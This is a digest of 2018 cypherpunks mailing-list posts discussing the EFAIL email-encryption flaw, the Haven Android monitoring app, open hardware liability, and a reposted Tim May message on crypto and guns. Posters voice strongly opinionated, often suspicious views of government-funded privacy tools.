Re: EFail - OpenPGP S/MIME Vulnerability

[Steve Kinney]

On 05/14/2018 01:48 PM, grarpamp wrote:

> The EFAIL attacks break PGP and S/MIME email encryption by coercing
> clients into sending the full plaintext of the emails to the attacker.

Werner & Co. respond:

https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html

Spoiler:  If your e-mail client software is not borken and
malconfigured, this is Not A Thing.

If it is, you lost the game a long time ago because don't know anything
about the rules, the board, the pieces or the objective.

:o/







signature.asc
Description: OpenPGP digital signature

[WAR] The West finally gets one up on Russia re torture

[Zenaan Harkness]

The reality of empires is eventually, if belatedly, exposed.
With Israel massacring dozens with impugnity, the USA's
"humanitarian" CIA , and now Russia (see below) it's sad days.


** What Moral Standing Do We Have After This Outrage? And Are We
About to Join *Another* Idiotic War, Like Feeble Minions?
https://russia-insider.us9.list-manage.com/track/click?u=fa2faf7034c3c3c413cb3652f=d18de50b27=5110f4b440

by Peter Hitchens (1,513 views) on Tue, May 15, 2018
Typical Russians, eh? They kidnap a man and his pregnant wife in
broad daylight, then hide them in a secret prison in an Asian airport
where they wield sinister influence. There they begin to torture him.
Despite the fact that she is obviously pregnant, they chain her to a
wall and put a hood over her head, for five days. Next, they swathe
her from head to toe in duct tape (in agony, because one of her eyes
is taped open) and fly them both to Syria so he can be tortured more
thoroughly for several years. With the two chained and bound
prisoners comes a delivery note from the Russian spy chief to his
Syrian opposite number: ‘This is the least we could do for you, to
demonstrate our remarkable relationship’.

Re: Haven - Android Physical Space Monitor

[juan]

On Tue, 15 May 2018 16:36:22 -0400
Steve Kinney  wrote:

> 
> 
> On 05/15/2018 03:17 PM, juan wrote:
> > On Mon, 14 May 2018 22:16:50 -0400
> > grarpamp  wrote:
> > 
> >> https://guardianproject.github.io/haven/
> >> https://www.youtube.com/watch?v=Fr0wEsISRUw
> >>
> >> Haven is for people who need a way to protect their personal spaces
> >> and possessions without compromising their own privacy. It is an
> >> Android application 
> > 
> > 
> > ah yes. Running a counter-surveillance system on hardware
> > and O.S. owned by the enemy makes so much sense...
> 
> Depends one's threat model, but yes:  Deploy a sensor network like the
> one described on 'smart' phones and viola, one presents a ready made
> high value surveillance installation to any actor with back door
> access to the devices used.
> 
> The U.S. State Department should fund this project if necessary to
> assure its completion and deployment as a convenient turnkey
> installation, endorsed by "rebel" branded media personalities. 


Yes. And that is exactly what the so called "guardian project"
does IIRC. let me recheck

https://en.wikipedia.org/wiki/The_Guardian_Project_%28software%29

"has received funding from Google, UC Berkeley with the
MacArthur Foundation, Avaaz, Internews, Open Technology Fund"

bingo.

https://en.wikipedia.org/wiki/Open_Technology_Fund

"U.S. Government funded program created in 2012 at Radio Free
Asia " 

rest of funders are of course total scum, either
pentagon-corporate or left-wing-fascist(that is,
pentagon-corporate).


> It
> fits the only-us model of security fail so beloved of the NSA & Co.,
> resistant to exploitation by State actors not under U.S. control, but
> wide open to Uncle Sam's boys and girls.

Yes. Since signal was mentioned in the advertising blurb,
signal deserves some comment as well.


https://en.wikipedia.org/wiki/Open_Whisper_Systems

OOPS. Lo an behold. Signal got 3 millions from the pentagon
again via the so called 'open technology fund'

'anarchist' moxie is such a principled hero...

the nice thing about signal is that you need a
pentagon-smartphone to use it. Cl!! Oh and moxie works for
fukkkerberg, making facebookkk great again!! that's even
coooler!!



> 
> Relevant:  See "Attacks over the radio processor" in this rather long
> article detailing cell phone vulnerabilities, which seems to indicate
> a hardware level back door in every one of those gadgets.
> 
> https://web.archive.org/web/20150605192550/https://pravokator.si/index.php/2014/06/02/on-mobile-phone-security/
> 
> =or=
> 
> https://tinyurl.com/cell-phn-insecurity
> 
> 
> 
> 
> 
> 
> 
> 

Re: Haven - Android Physical Space Monitor

[Steve Kinney]

On 05/15/2018 03:17 PM, juan wrote:
> On Mon, 14 May 2018 22:16:50 -0400
> grarpamp  wrote:
> 
>> https://guardianproject.github.io/haven/
>> https://www.youtube.com/watch?v=Fr0wEsISRUw
>>
>> Haven is for people who need a way to protect their personal spaces
>> and possessions without compromising their own privacy. It is an
>> Android application 
> 
> 
>   ah yes. Running a counter-surveillance system on hardware
>   and O.S. owned by the enemy makes so much sense...

Depends one's threat model, but yes:  Deploy a sensor network like the
one described on 'smart' phones and viola, one presents a ready made
high value surveillance installation to any actor with back door access
to the devices used.

The U.S. State Department should fund this project if necessary to
assure its completion and deployment as a convenient turnkey
installation, endorsed by "rebel" branded media personalities.  It fits
the only-us model of security fail so beloved of the NSA & Co.,
resistant to exploitation by State actors not under U.S. control, but
wide open to Uncle Sam's boys and girls.

Relevant:  See "Attacks over the radio processor" in this rather long
article detailing cell phone vulnerabilities, which seems to indicate a
hardware level back door in every one of those gadgets.

https://web.archive.org/web/20150605192550/https://pravokator.si/index.php/2014/06/02/on-mobile-phone-security/

=or=

https://tinyurl.com/cell-phn-insecurity










signature.asc
Description: OpenPGP digital signature

cypherpunls and guns

[juan]

out of the memory hole : 

--


At 12:51 AM -0800 1/6/98, Wei Dai wrote:

>I don't understand why there is so much talk about guns here lately.
>Unless someone comes up with a weapon that has some very unusual economic
>properties, individuals cannot hope to compete with governments in the
>domain of deadly force. If we have to resort to physical violence, we've
>already lost!

People on almost any unmoderated mailing list will talk about what
interests them. Those who mainly want to talk about crypto are of course
free to do so.

(You have, Wei, done important work in this area. But you very, very seldom
write articles on this list, at least not for the last couple of years--I
count less than one article per month from you over the past half year. I
urge you to write such articles if you dislike reading what others are
writing.)

I agree that two or three or four or five years ago I was much more likely
to write about something more crypto-related. Well, much time has passed.
Most things worth saying have been said, at least for me. I can't work up
the energy to discuss "data havens" a fourth or fifth time.

(And an article from me on data havens, or information markets, or crypto
anarchy, will usually produce complaints from people who don't see what it
has to do with getting the latest version of PGP! That's only a slight
exaggeration.)

There have also been very few major new participants. A few years ago we
could count on one or two major new "talents" joining the list each year,
generating articles and new ideas. For whatever reasons, this has nearly
stopped.

I would guess the reasons are related to a) no major publicity stories as
in past years, b) the disintegration of the list a year ago in the wake of
the "moderation" fiasco (which cut subscriptions by 3-5x), c) competition
from several other crypto lists, "moderated" by their owners, d) exhaustion
of the older participants in the battles, and e) those who are interested
in our topics have mostly already found us (meaning, the rich hunting
period is over). ;


>Think about it: if we can defend ourselves with guns, why would we need
>crypto?

This has an obvious answer. Guns are a last resort. Crypto makes it less
likely that Big Brother will know what the proles are talking about, less
likely that participants in a plan will be targetted for investigation and
raids.

Wei, your question could be paraphrased this way:

"If Pablo Escobar could defend himself with guns, why did he need crypto in
his cellphone?"

(The answer being that P. Escobar was detected by using a cellphone without
security. The NSA then told the DEA and its allies where he was and they
took him out on a rooftop.)

Final comment: If I find the motivation, I may finish an essay I've been
working on about how we, the Cypherpunks and the World, are *retrogressing*
in crypto areas. Most of the exotic applications are no longer being
discussed, and various mundane commercial products are the main focus. Yawn.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
-:-:-:-:-:-:-:
Timothy C. May  | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

Re: Haven - Android Physical Space Monitor

[juan]

On Mon, 14 May 2018 22:16:50 -0400
grarpamp  wrote:

> https://guardianproject.github.io/haven/
> https://www.youtube.com/watch?v=Fr0wEsISRUw
> 
> Haven is for people who need a way to protect their personal spaces
> and possessions without compromising their own privacy. It is an
> Android application 


ah yes. Running a counter-surveillance system on hardware
and O.S. owned by the enemy makes so much sense...




> We designed Haven for
> investigative journalists, human rights defenders, 

ah yes, only journos matter.


> and people at risk
> of forced disappearance to create a new kind of herd immunity. By
> combining the array of sensors found in any smartphone, with the
> world’s most secure communications technologies, like Signal and Tor,

it is a honeypot. 


> Haven prevents 

does it?


the worst kind of people from silencing citizens
> without getting caught in the act.

G. Edward Griffin: Voluntaryism, Soviets, Cancer, Banks, Crypto

[grarpamp]

Cryptocurrency with WAM at Take The Red Pill Winnipeg
https://www.youtube.com/watch?v=BC3s8rnYLa0
Bitcoin with Max Wright and Trace Mayer
https://www.youtube.com/watch?v=Id6rK87GF8M

America with Lauren Southern
https://www.youtube.com/watch?v=rimtKVZlnKs

Interviews Yuri Bezmenov
https://www.youtube.com/watch?v=y3qkf3bajd4

The Creature From Jekyll Island w/ interview
https://www.youtube.com/watch?v=lu_VqX6J93k
https://www.youtube.com/watch?v=R1gTnOkdXps
In Nielsio's Voluntary Library
https://www.youtube.com/user/Nielsio/videos

A World Without Cancer
https://www.youtube.com/watch?v=JGsSEqsGLWM

Re: EFail - OpenPGP S/MIME Vulnerability

[grarpamp]

Various:
>>> Remember the campaign against HTML email ? I do.
>>> We were right.
>>
>> I always disable HTML. And fetching of remote content.
>>
>> And I have since the 90s. I got that from this list :)
>
> Honestly i'm missing PINE and ELM right about now.

trn, ftw.

There's neomutt seems popular for text mail these days
since mutt was also seen being dormant.

Re: From sand to silicon chips, openly

[grarpamp]

On Tue, May 15, 2018 at 12:39 AM, Steven Schear  wrote:
> A good example of why totally open chips are problematic in the commercial
> world.
>
> Spectre/Meltdown Pits Transparency Against Liability: Which is More
> Important to You?
> https://www.bunniestudios.com/blog/?p=5127
>
> As always, the devil is in the details.
>
> " You can’t have it both ways: the whole point of transparency is to enable
> peer review, so you can find and fix bugs more quickly. But if every time a
> bug is found, a manufacturer had to hand $50 to every user of their product
> as a concession for the bug, they would quickly go out of business. This
> partially answers the question why we don’t see open hardware much beyond
> simple breakout boards and embedded controllers: it’s far too risky from a
> liability standpoint to openly share the documentation for complex systems
> under these circumstances. "

As an incomplete snip from article, it would be bullshit on its own.
At least for systems that start their life as open.

Closed hardware / software generally asserts its fitness, at least in the
corporate sales pitch, so when it fails you can sue the fuck out of them.
For example, Intel is sued in court over Meltdown right now.

Open fabs / hardware / software / dev pushes that entire analysis out to
the user... they can inspect it, pay for analyst verification, read
reviews, etc.

In an open model, it becomes understood that all that is upon you,
and the recourse is no longer suit, but filing bugs and commits
and process change, and then the next release happens.

That paradigm shift is the exact same in open fabs and hardware
as it is in open software, even now in currencies and markets.

You don't see it today because they want power, profit, control,
and to them closed over the ignorant is the way to achieve that.
After all, to date all the sheep have accepted that model of abuse.

Openness and sharing is now proving in demand, profitable,
and hopefully slowly taking over.


Similar conclusions were in the article...
"The Choice: Truthful Mistakes or Fake Perfection?"

The offer is on the table.

Even corporate users of HW know their fitness lawsuits etc will not
always win and recover losses, so they'd also be insane not to offer it.


> " However, even one of their most ardent open-source advocates pushed back
> quite hard when I suggested they should share their pre-boot code. By
> pre-boot code, I’m not talking about the little ROM blob that gets run after
> reset to set up your peripherals so you can pull your bootloader from SD
> card or SSD. That part was a no-brainer to share. I’m talking about the code
> that gets run before the architecturally guaranteed “reset vector”. A number
> of software developers (and alarmingly, some security experts) believe that
> the life of a CPU begins at the reset vector. In fact, there’s often a
> significant body of code that gets executed on a CPU to set things up to
> meet the architectural guarantees of a hard reset – bringing all the
> registers to their reset state, tuning clock generators, gating peripherals,
> and so forth. Critically, chip makers heavily rely upon this pre-boot code
> to also patch all kinds of embarrassing silicon bugs, and to enforce binning
> rules."
>
> If, OTOH, there were ways to manufacture arbitrarily complex chips on the
> desktop for reasonable costs and in reasonable time, and so eliminate the
> commercial issues, this conundrum could vanish.
>
>
>
> On Wed, Mar 21, 2018 at 9:13 AM, Steven Schear 
> wrote:
>>
>> http://parallel.princeton.edu/openpiton/open_source_processors.php

Nice list.
Where's Intel and AMD and Qualcomm and ...

Re: EFail - OpenPGP S/MIME Vulnerability

[Marina Brown]

On 05/15/2018 02:14 AM, Mirimir wrote:

On 05/14/2018 06:05 PM, Marina Brown wrote:

On 05/14/2018 07:49 PM, Mirimir wrote:

On 05/14/2018 06:48 AM, grarpamp wrote:

https://efail.de/
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
https://efail.de/efail-attack-paper.pdf
https://twitter.com/matthew_d_green/status/995989254143606789
https://news.ycombinator.com/item?id=17064129
https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now

https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smime-bugs-can-reveal-encrypted-e-mails-uninstall-now/



The EFAIL attacks break PGP and S/MIME email encryption by coercing
clients into sending the full plaintext of the emails to the attacker.
In a nutshell, EFAIL abuses active content of HTML emails, for example
externally loaded images or styles, to exfiltrate plaintext through
requested URLs. To create these exfiltration channels, the attacker
first needs access to the encrypted emails, for example, by
eavesdropping on network traffic, compromising email accounts, email
servers, backup systems or client computers. The emails could even
have been collected years ago.


Thanks. That's the clearest explanation I've seen.




Remember the campaign against HTML email ? I do.
We were right.

--- Marina


Right, and its evil child, remote content.

I always disable HTML. And fetching of remote content.

And I have since the 90s. I got that from this list :)

It's funny that these exploits depend on both. And that some on HN put
it all on pgp/gpg, arguing that one can't expect users to know this
stuff. By default, Thunderbird does render HTML. But at least it doesn't
fetch remote content. So Thunderbird+Enigmail users should be safe.



Honestly i'm missing PINE and ELM right about now.

--- Marina